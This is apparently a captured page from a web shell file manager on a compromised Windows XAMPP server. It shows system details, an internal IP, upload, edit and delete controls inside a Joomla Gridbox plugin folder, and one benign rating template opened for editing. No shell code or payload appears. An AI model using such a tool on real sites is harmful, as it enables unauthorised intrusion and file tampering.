[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
components
/
com_gridbox
/
views
/
layout
/
patterns
/
plugins
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 ba-box-model-margin.php
519 B
SET
[ EDIT ]
|
[ DEL ]
📄 social-share.php
1,082 B
SET
[ EDIT ]
|
[ DEL ]
📄 star-ratings-schema.php
1,008 B
SET
[ EDIT ]
|
[ DEL ]
📄 star-ratings.php
861 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: star-ratings-schema.php
<?php /** * @package Gridbox * @author Balbooa http://www.balbooa.com/ * @copyright Copyright @ Balbooa * @license http://www.gnu.org/licenses/gpl.html GNU/GPL */ defined('_JEXEC') or die; ob_start(); ?> <div class="info-wrapper"> <?php if ($obj->count > 0) { ?> <div itemprop="aggregateRating" itemscope itemtype="http://schema.org/AggregateRating"> <meta itemprop="ratingValue" content="<?php echo $obj->rating; ?>"> <meta itemprop="reviewCount" content="<?php echo $obj->count; ?>"> </div> <?php } ?> <span class="rating-wrapper"> <span class="rating-title"><?php echo JText::_('RATING'); ?> </span> <span class="rating-value"><?php echo $obj->rating; ?></span> </span> <span class="votes-wrapper"> (<span class="votes-count"><?php echo $obj->count; ?></span> <span class="votes-title"> <?php echo JText::_('VOTES'); ?></span>) </span> </div> <?php $out = ob_get_contents(); ob_end_clean();